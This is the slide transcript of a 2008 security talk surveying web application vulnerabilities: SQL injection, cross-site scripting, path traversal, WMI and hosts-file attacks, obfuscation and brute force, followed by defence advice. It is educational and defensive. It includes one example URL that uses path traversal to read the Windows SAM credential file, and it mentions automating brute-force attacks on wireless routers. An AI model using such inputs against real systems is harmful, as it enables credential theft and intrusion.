ms innovation day: a lap around web application vulnerabilities by mvp walter wong
DESCRIPTION
A live hacking session demonstrating the different tools and techniques used by hackers and an in-depth understanding of the problems of insecure application and the solutions to solve the vulnerability.TRANSCRIPT
Lap Around Web Application Vulnerabilities
Walter WongMVP – Visual Developer (Security)[email protected]://spaces.live.com/walterwws
Top 10 Web Application vulnerabilities in 2007
•Cross-site Scripting (XSS)
1
•Injection Flaws
2
•Malicious File Execution
3
•Insecure Direct Object Reference
4
•Cross Site Request Forgery
5
•Information Leakage and Improper Error Handling
6
•Broken Authentication and Session Management
7
•Insecure Cryptographic Storage
8
•Insecure Communications
9
•Failure to Restrict URL Access
10
Source: http://www.owasp.org/index.php/top_10_2007
Agenda
The foundation of attackAdvance attack techniquesObfuscationAutomated Testing
Foundation of attack
Application attack also known as “layer 7 attack”Program is just a set of instruction.Developer is the key protectorAll input is evil (Writing Secure Code by Michael Howard and David LeBlanc)
3 basic techniques
Path Traversal
Cross-site Scripting
SQL Injection
SQL Injection
Build SQL statement using string concatenationAttacker change the semantics of SQL queryDeveloper prefer string concatenation because is easy but they also known the safer method but requires more thought
Scenario #1
Attacker submit specially crafted input when performing search
SQL Injection
Date : 12 June 2008
http://www.lowyat.net
3 basic techniques
Path Traversal
Cross-site Scripting
SQL Injection
Cross-site Scripting (XSS)
How it works?1. Take input from user2. Fails to validate input3. Echoes input directly to web page4. Done!
Scenario #2
When developer using
<%# DataBinder.Eval(Container.DataItem, “Column1”) %>
to bind data in Datalist.
Cross-Site Scripting (XSS)
3 basic techniques
Path Travers
al
Cross-site
Scripting
SQL Injectio
n
Path Traversal
Access files that application not intend to accessTo read any files in the systemUsing “dot-dot-slash” to backtrack the folder
Example:http://app.com/GetImage.aspx?file=..\..\windows\repair\sam
Scenario #3
To prevent “Resource cannot be found”, developer create a page to check whether the picture file it exist or not. If doesn’t exist it will show the generic image.
Path Traversal
Advance Technique
Utilizing the basic attack techniquesAble to unveil a lot of privacy information of serversExample:
WMI AttackHost File Hijacking
WMI Attack
WMI = Windows Management InstrumentationWMI is a essential tools for IT Administrator to manage the servers and workstationsDamages:
Retrieve server’s information Remotely uninstall application
Scenario #4
Attack retrieve the software installed in web server and uninstall the software.
WMI Attack
Host File Hijacking
Windows rely on DNS and Host file to resolve the target IP addressHost file location : %windir%\system32\drivers\etc\hostsDamages:
Corrupt the host file so it can redirect the data to malicious server
Scenario #5
Attacker redirect the traffic for www.abc.com to different IP address. Imagine a antivirus application refer the wrong IP address to download the latest signature file.
Host File Hijacking
Obfuscation
The default .Net assembly format allow developer to disassemble and decompile.Obfuscate is a process to rebuilds the .Net assembly into a new format that is impossible to dissemble, decompile and difficult to understand.Prevent competitors and hackers from getting your source code.
Scenario #6
Attacker download the .Net assembly through Path Traversal attack. He successfully dissemble and decompile the assembly. Attacker now able to view all the logic behind the source code.
Obfuscator
Automated Testing
Develop your own testing tools Automate your testing processVisual Studio Tester Edition have a capability to do automated testing
The Dark Side……
Brutal Force attack are using the same techniqueIt is a common attack to “try” out passwordTo prevent such attack, identify the source.
MAC AddressIP AddressLogin username
Scenario #7
Develop a simple application to automate the brutal force attack on wireless router.
Automate the task
Steps to Defense Against Attackers
Validate both client-side and server-side inputDuplicated the validation functions in both client-side and server sideNO SQL Injection – use Parameter class in .NetNO XSS – Validate Input, Validate Output (VIVO)Obfuscate your code TODAY!Be innovative and creative in testing
ResourcesRequired slide
Visit My Blog athttp://spaces.live.com/walterwws
ResourcesRequired slide
Visit My Pagecast athttp://www.pageflakes.com/walterw
© 2008 Microsoft Corporation. All rights reserved. Microsoft, Windows, Windows Vista and other product names are or may be registered trademarks and/or trademarks in the U.S. and/or other countries.The information herein is for informational purposes only and represents the current view of Microsoft Corporation as of the date of this presentation. Because Microsoft must respond to changing market conditions, it should not be interpreted to be a commitment on the part of Microsoft, and Microsoft cannot guarantee the accuracy of any information provided after the date of this presentation. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED
OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.